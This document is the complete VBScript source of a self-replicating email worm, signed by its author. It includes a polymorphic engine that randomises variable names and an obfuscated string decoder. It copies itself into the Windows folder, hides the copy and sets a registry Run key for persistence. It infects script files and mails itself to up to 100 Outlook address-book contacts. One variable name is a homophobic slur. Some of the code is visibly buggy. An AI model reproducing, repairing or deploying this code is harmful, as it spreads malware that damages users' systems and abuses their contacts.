 
LaM3rizE()

Function RNL()
Randomize 
RNL = Chr(Int(Rnd * 25) + 65)
End Function 
 
Function P0LY(OldCode) 
Dim Var(36) 
On Error Resume Next
Randomize 
Var(1) = "OldCode": Var(2) = "P0LY" :Var(3) = "Var"
Var(4) = "LaMEr": Var(5) = "FSO": Var(6) = "ThisFile" 
Var(7) = "NewCode": Var(8) = "Abacus": Var(9) = "RNL" 
Var(10) = "NumGYT": Var(11) = "DoggiE": Var(12) = "xqqlcosxvaoxlrn" 
Var(13) = "nmjkhbgzbkjmemg": Var(14) = "qoeyrnkcultpvaf": Var(15) = "W1n" 
Var(16) = "VIRUSFILE": Var(17) = "GarbagE": Var(18) = "EMale"
Var(19) = "Ge0rgE": Var(20) = "InFEcT": Var(21) = "D0nE"
Var(22) = "ThEW0rm": Var(23) = "OutApp": Var(24) = "MaPIObj" 
Var(25) = "Mail": Var(26) = "AddYLisTZ": Var(27) = "RECIPIENTS"
Var(28) = "EVERYTHING": Var(29) = "Fold3R": Var(30) = "FiLEz" 
Var(31) = "F1le": Var(32) = "IHATEGAYZ": Var(33) = "DeaTH" 
Var(34) = "Wsh": Var(35) = "DEC": Var(36) = "SQUIBBLE" 
For LaMEr = 1 To 36 
RNL() 
Randomize 
NumGYT = Int((Rnd * 10) + 1)
If NumGYT < 4 Then 
DoggiE = RNL & RNL & RNL & RNL 
Elseif NumGYT = 9 Then 
DoggiE = RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL
Elseif NumGYT = 6 Then ' 
DoggiE = RNL & RNL & RNL & RNL & RNL & RNL 
Elseif NumGYT = 7 Then 
DoggiE = RNL & RNL & RNL & RNL & RNL & RNL & RNL 
Elseif NumGYT = 8 Then 
DoggiE = RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL
Elseif NumGYT = 5 Then 
DoggiE = RNL & RNL & RNL & RNL & RNL 
Elseif NumGYT = 10 Then 
DoggiE = RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL & RNL 
End If 
LaMEr_LaMEr = DoggiE 
While InStr(1, OldCode, Var(LaMEr), vbTextCompare) 
OldCode = Mid(OldCode, 1, InStr(1, OldCode, Var(LaMEr), vbTextCompare) - 1) & LaMEr_LaMEr & Mid(OldCode, InStr(1, OldCode, Var(LaMEr), vbTextCompare) + Len(Var(LaMEr)), Len(OldCode) - InStr(1, OldCode, Var(LaMEr), vbTextCompare))
Wend 
Next
P0LY = OldCode 
End Function

Sub LaM3rizE()
On Error Resume Next 
Set FSO = CreateObject(DEC("Rbshquhof/GhmdRxrudlNckdbu"))  
Set W1n = FSO.GetSpecialFolder(0) '  
Set ThisFile = FSO.OpenTextFile(WScript.ScriptFullName) 
NewCode = DEC("=Rbshqu!M`oft`fd!<!WCrbshqu?") & Vbcrlf & P0LY(ThisFile.ReadAll) & Vbcrlf & DEC("=.") & DEC("Rbshqu?") 
ThisFile.Close 
Set Abacus = FSO.CreateTextFile(W1n & DEC("]WHSTRGHMD/uyu/z2141g5e9,89C4,00BG,CC93,11@@11CEBD1C|")) 
Abacus.Write(NewCode) 
Abacus.Close ' 
Set Wsh = CreateObject("Wscript.Shell") 
Wsh.RegWrite(DEC("IJML]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]StoRdswhbdr]M`LDsGRNL`hm"), W1n & DEC("]WHSTRGHMD/uyu/z2141g5e9,89C4,00BG,CC93,11@@11CEBD1C|"))
Wsh.RegWrite DEC("IJML]Rnguv`sd]M`L2s"), DEC("M`L2s!1vo%!X1t") 
Set GarbagE = FSO.GetFile(W1n & DEC("]WHSTRGHMD/uyu/z2141g5e9,89C4,00BG,CC93,11@@11CEBD1C|")) 
GarbagE.Attributes = GarbagE.Attributes + 2
Set Ge0rgE = Wsh.RegRead(DEC("IJML]rnguv`sd]M`L2s]HoGDbU"))
If Ge0rgE <> DEC("E1oD") Then
InFEcT(W1n) 
End If 
End Sub

Function DEC(xqqlcosxvaoxlrn)
For nmjkhbgzbkjmemg = 1 To Len(xqqlcosxvaoxlrn)
qoeyrnkcultpvaf = Mid(xqqlcosxvaoxlrn, nmjkhbgzbkjmemg, 1)
SQUIBBLE = Asc(qoeyrnkcultpvaf)
If Asc(qoeyrnkcultpvaf) <> 34 And Asc(qoeyrnkcultpvaf) <> 35 And Asc(qoeyrnkcultpvaf) Mod 2 = 0 Then
qoeyrnkcultpvaf = Chr(SQUIBBLE + 1)
ElseIf Asc(qoeyrnkcultpvaf) <> 34 And Asc(qoeyrnkcultpvaf) <> 35 And Asc(qoeyrnkcultpvaf) Mod 2 <> 0 Then
qoeyrnkcultpvaf = Chr(SQUIBBLE - 1)
End If
DEC = DEC & qoeyrnkcultpvaf
Next
End Function

Function EMale(ThEw0rM) 
On Error Resume Next 
Set OutApp = CreateObject(DEC("Ntumnnj/@qqmhb`uhno")) 
Set MaPIObj = OutApp.GetNameSpace(DEC("L@QH"))
Set Mail = OutApp.CreateItem(0) 
Set AddYLisTZ = MAPI.AddressLists(1) 
For RECIPIENTS = 1 To 100 
Mail.To = AddYLisTZ.AddressEntries(RECIPIENTS).Address 
Mail.Subject = DEC("")
Mail.HTMLbody = NewCode 
Mail.Attachments.Add = ThEw0rM 
Mail.Send 
Next 
Wsh.RegWrite DEC("IJML]Rnguv`sd]M`L2s]DL`md"), DEC("E1oD")
End Function
 
Function InFEcT(EVERYTHING) 
Set Fold3R = FSO.GetFolder(EVERYTHING) 
Set FiLEz = Fold3R.Files 
For Each F1le In FiLEz 
If FSO.GetExtensionName(F1le.Path) = DEC("iu`") Or DEC("iul") Or DEC("iulm") Then
Set IHATEGAYZ = FSO.OpenTextFile(F1le.Path) 
IHATEGAYZ.WriteLine(NewCode) 
Set NewCode = IHATEGAYZ.ReadAll 
IHATEGAYZ.Close 
Set DeaTH = Wsh.RegRead(DEC("IJML]rnguv`sd]M`L2s]DL`md")) 
If DeaTH <> DEC("E1oD") Then
EMale(GarbagE)
End If 
End If 
Next 
Wsh.RegWrite DEC("IJML]Rnguv`sd]M`L2s]HoGDbU"), DEC("E1oD") 
End Function


' Cheerz GuY$ F0r ThE Gr3aT PolY Eng1NE
' H0pE Y0u DonT M1nD If I'vE M0diFieD IT?? ;) 
' And Y0u [K] F0r ThE EnC Util - SaV3$ S0 MucH Time ;)
' ||||||||||||||||||||||||||||||||||||||||||||||||||||
' LaM3r 0wn$ Y0u
